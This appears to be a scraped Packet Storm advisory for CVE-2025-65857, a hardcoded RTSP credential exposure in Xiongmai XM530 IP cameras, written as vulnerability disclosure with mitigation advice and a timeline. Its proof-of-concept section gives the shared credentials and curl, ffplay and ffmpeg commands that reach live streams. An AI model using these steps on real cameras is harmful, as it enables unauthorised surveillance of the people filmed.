{“lastseen”:”2025-12-18T16:35:09″,”description”:”The GetStreamUri ONVIF endpoint in Xiongmai XM530-series IP cameras exposes RTSP URIs containing hardcoded credentials, enabling direct unauthorized access to live video streams…”,”published”:”2025-12-18T00:00:00″,”modified”:”2025-12-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Xiongmai XM530 IP Camera Hardcoded RTSP Credential Exposure”,”source”:””,”references”:””,”id”:”PACKETSTORM:213043″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2017-16725″,”CVE-2018-10088″,”CVE-2018-17915″,”CVE-2018-6830″,”CVE-2025-65856″,”CVE-2025-65857″],”sourceData”:”# CVE-2025-65857\\n \\n **Xiongmai XM530 IP Camera Hardcoded RTSP Credentials Exposure**\\n \\n —\\n \\n ## Summary\\n \\n The GetStreamUri ONVIF endpoint in Xiongmai XM530-series IP cameras exposes RTSP URIs containing hardcoded credentials, enabling direct unauthorized access to live video streams.\\n \\n **CVE ID:** CVE-2025-65857 \\n **Severity:** CRITICAL \\n **CVSS v3.1 Score:** 9.1 \\n **CVSS Vector:** `CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:N\/A:H`\\n \\n ### CVSS Breakdown\\n \\n * **Attack Vector (AV):** Network – Remotely exploitable\\n * **Attack Complexity (AC):** Low – Credentials hardcoded in all devices\\n * **Privileges Required (PR):** None – Accessible via CVE-2025-65856\\n * **User Interaction (UI):** None – Zero-click exploitation\\n * **Confidentiality:** High – Complete video stream access\\n * **Integrity:** None – Read-only credential exposure\\n * **Availability:** High – Potential DoS via stream exhaustion\\n \\n —\\n \\n ## Affected Products\\n \\n **Vendor:** Hangzhou Xiongmai Technology Co., Ltd. \\n **Product:** IP Camera XM530V200_X6-WEQ_8M \\n **Commercial Brand:** ANBIUX (and hundreds of OEM rebrands) \\n **Firmware:** V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06 and likely all V5.00.R02.* versions \\n **Component:** ONVIF Media Service – GetStreamUri endpoint\\n \\n **Device Context:** \\n Xiongmai is a major OEM supplier of IP cameras sold under hundreds of brand names globally. These cameras are widely deployed in residential, commercial, and industrial surveillance systems.\\n \\n —\\n \\n ## Vulnerability Details\\n \\n The `GetStreamUri` ONVIF endpoint returns RTSP URIs with hardcoded credentials embedded directly in the URL.\\n \\n **Technical Details:**\\n \\n 1. **Hard-coded Credentials (CWE-798)**\\n * Username: `wphd`\\n * Password: `2MNswbQ5`\\n * Identical across all tested devices\\n * Do not change when admin password is modified\\n \\n 2. **Insufficiently Protected Credentials (CWE-522)**\\n * Credentials transmitted in plaintext over HTTP\\n * Embedded in URI format: `rtsp:\/\/[IP]:554\/user=wphd_password=2MNswbQ5_channel=0_stream=0\\u0026onvif=0.sdp?real_stream`\\n * No encryption or obfuscation\\n \\n 3. **Combined with CVE-2025-65856:**\\n * GetStreamUri endpoint accessible without authentication\\n * Complete zero-click access to live video streams\\n * No authentication barriers whatsoever\\n \\n —\\n \\n ## Impact\\n \\n An unauthenticated remote attacker can:\\n \\n * Obtain RTSP credentials via unauthenticated ONVIF request\\n * Access live video and audio streams directly\\n * Monitor surveillance feeds in real-time\\n * Perform mass surveillance (credentials work across all devices)\\n * Violate privacy of camera subjects\\n \\n **Privacy Impact:** \\n * Critical violation of GDPR and privacy regulations\\n * Enables targeted surveillance and stalking\\n * Mass surveillance operations feasible\\n * No user notification of unauthorized access\\n \\n **Real-world Scenarios:**\\n * Home surveillance cameras monitored by strangers\\n * Business security feeds accessible to competitors\\n * Residential privacy completely compromised\\n \\n —\\n \\n ## Proof of Concept\\n \\n **Step 1: Obtain Valid Profile Tokens (No Authentication Required)**\\n \\n “`bash\\n curl -X POST http:\/\/[CAMERA_IP]:8899\/onvif\/device_service \\\\\\n -H \\”Content-Type: application\/soap+xml\\” \\\\\\n -d ‘\\u003c?xml version=\\”1.0\\” encoding=\\”UTF-8\\”?\\u003e\\n \\u003cs:Envelope xmlns:s=\\”http:\/\/www.w3.org\/2003\/05\/soap-envelope\\”\\u003e\\n \\u003cs:Body xmlns:trt=\\”http:\/\/www.onvif.org\/ver10\/media\/wsdl\\”\\u003e\\n \\u003ctrt:GetProfiles\/\\u003e\\n \\u003c\/s:Body\\u003e\\n \\u003c\/s:Envelope\\u003e’\\n “`\\n \\n **Response includes available profiles:**\\n – Token `000` – mainStream (3200×1800 H264)\\n – Token `001` – subStream (800×448 H264)\\n – Token `002` – snapStream (800×448 JPEG)\\n \\n **Step 2: Extract RTSP URI with Hardcoded Credentials**\\n \\n “`bash\\n curl -X POST http:\/\/[CAMERA_IP]:8899\/onvif\/Media \\\\\\n -H \\”Content-Type: application\/soap+xml\\” \\\\\\n -d ‘\\u003c?xml version=\\”1.0\\” encoding=\\”UTF-8\\”?\\u003e\\n \\u003cs:Envelope xmlns:s=\\”http:\/\/www.w3.org\/2003\/05\/soap-envelope\\”\\u003e\\n \\u003cs:Body xmlns:trt=\\”http:\/\/www.onvif.org\/ver10\/media\/wsdl\\”\\u003e\\n \\u003ctrt:GetStreamUri\\u003e\\n \\u003ctrt:StreamSetup\\u003e\\n \\u003ctt:Stream xmlns:tt=\\”http:\/\/www.onvif.org\/ver10\/schema\\”\\u003eRTP-Unicast\\u003c\/tt:Stream\\u003e\\n \\u003ctt:Transport xmlns:tt=\\”http:\/\/www.onvif.org\/ver10\/schema\\”\\u003e\\n \\u003ctt:Protocol\\u003eRTSP\\u003c\/tt:Protocol\\u003e\\n \\u003c\/tt:Transport\\u003e\\n \\u003c\/trt:StreamSetup\\u003e\\n \\u003ctrt:ProfileToken\\u003e000\\u003c\/trt:ProfileToken\\u003e\\n \\u003c\/trt:GetStreamUri\\u003e\\n \\u003c\/s:Body\\u003e\\n \\u003c\/s:Envelope\\u003e’\\n “`\\n \\n **Response exposes hardcoded credentials:**\\n “`xml\\n \\u003ctt:Uri\\u003ertsp:\/\/[CAMERA_IP]:554\/user=wphd_password=2MNswbQ5_channel=0_stream=0\\u0026onvif=0.sdp?real_stream\\u003c\/tt:Uri\\u003e\\n “`\\n \\n **Step 3: Access Video Stream Directly**\\n \\n “`bash\\n # Using ffplay\\n ffplay \\”rtsp:\/\/[CAMERA_IP]:554\/user=wphd_password=2MNswbQ5_channel=0_stream=0\\u0026onvif=0.sdp?real_stream\\”\\n \\n # Using VLC\\n vlc \\”rtsp:\/\/[CAMERA_IP]:554\/user=wphd_password=2MNswbQ5_channel=0_stream=0\\u0026onvif=0.sdp?real_stream\\”\\n \\n # Using ffmpeg (recording)\\n ffmpeg -i \\”rtsp:\/\/[CAMERA_IP]:554\/user=wphd_password=2MNswbQ5_channel=0_stream=0\\u0026onvif=0.sdp?real_stream\\” -c copy output.mp4\\n “`\\n \\n **Result:** Complete access to live video stream with zero authentication in three simple steps.\\n \\n —\\n \\n ## Mitigation\\n \\n ### For Users (Immediate):\\n \\n * **Network Isolation:** Place cameras on isolated VLAN with no internet access\\n * **Firewall Rules:** Block all inbound connections to RTSP port 554\\n * **VPN-Only Access:** Never expose cameras directly to internet\\n * **Monitor RTSP Connections:** Log and alert on unexpected RTSP sessions\\n * **Consider Replacement:** Given vendor’s security history, replacement strongly recommended\\n \\n ### For Vendor:\\n \\n * Remove hardcoded credentials from RTSP URIs\\n * Implement RTSP Digest Authentication (RFC 2617)\\n * Use session tokens with expiration\\n * Generate unique credentials per device\\n * Implement rate limiting on RTSP connections\\n \\n **No patch currently available.**\\n \\n —\\n \\n \\n ## Timeline\\n \\n * **November 2025:** Vulnerability discovered during security assessment\\n * **December 16, 2025:** CVE-2025-65857 assigned by MITRE\\n * **December 17, 2025:** Vendor contact attempted via XMSRC@xiongmaitech.com (email delivery failed – server misconfigured)\\n * **December 17, 2025:** Alternative contact attempted via oversea_sales@xiongmaitech.com (email delivery failed)\\n * **December 18, 2025:** Public disclosure\\n \\n **Vendor Response:** No response received. Official security contact infrastructure non-functional.\\n \\n —\\n \\n ## Credits\\n \\n **Discovered by:** Luis Miranda Acebedo \\n **Location:** Vigo, Galicia, Spain \\n **Contact:** luis.miranda.acebedo@gmail.com\\n \\n —\\n \\n ## References\\n \\n * **CVE:** https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2025-65857\\n * **Related:** CVE-2025-65856 (ONVIF Authentication Bypass)\\n * **CWE-798:** https:\/\/cwe.mitre.org\/data\/definitions\/798.html\\n * **CWE-522:** https:\/\/cwe.mitre.org\/data\/definitions\/522.html\\n * **RTSP RFC 2326:** https:\/\/tools.ietf.org\/html\/rfc2326\\n * **Similar CVE:** CVE-2018-6830 (Foscam – Similar RTSP credential exposure)\\n * **Vendor History:**\\n * CVE-2017-16725 (Directory traversal, unpatched)\\n * CVE-2018-10088 (Authentication bypass, unpatched)\\n * CVE-2018-17915, 17917, 17919 (XMEye P2P vulnerabilities)\\n * Mirai botnet contributor (2016)\\n * SEC Consult Advisory (2018): \\”Recommend discontinuing Xiongmai products\\”\\n \\n This site is open source. [Improve this page](https:\/\/github.com\/LuisMirandaAcebedo\/CVE-2025-65857\/edit\/main\/README.md).”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213043″,”cvss”:{“score”:10,”severity”:”HIGH”,”vector”:”AV:N\/AC:L\/Au:N\/C:C\/I:C\/A:C”,”version”:”2.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:”3.0″,”vectorString”:”CVSS:3.0\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”baseScore”:9.8,”baseSeverity”:”CRITICAL”,”attackVector”:”NETWORK”,”attackComplexity”:”LOW”,”privilegesRequired”:”NONE”,”userInteraction”:”NONE”,”scope”:”UNCHANGED”,”confidentialityImpact”:”HIGH”,”integrityImpact”:”HIGH”,”availabilityImpact”:”HIGH”}},”href”:”https:\/\/packetstorm.news\/files\/id\/213043\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-18T16:35:09″,”description”:”The GetStreamUri ONVIF endpoint in Xiongmai XM530-series IP cameras exposes RTSP URIs containing hardcoded credentials, enabling direct unauthorized access to live video streams…”,”published”:”2025-12-18T00:00:00″,”modified”:”2025-12-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Xiongmai XM530…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,36,12,15,13,53,7,11,5],"class_list":["post-31886","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n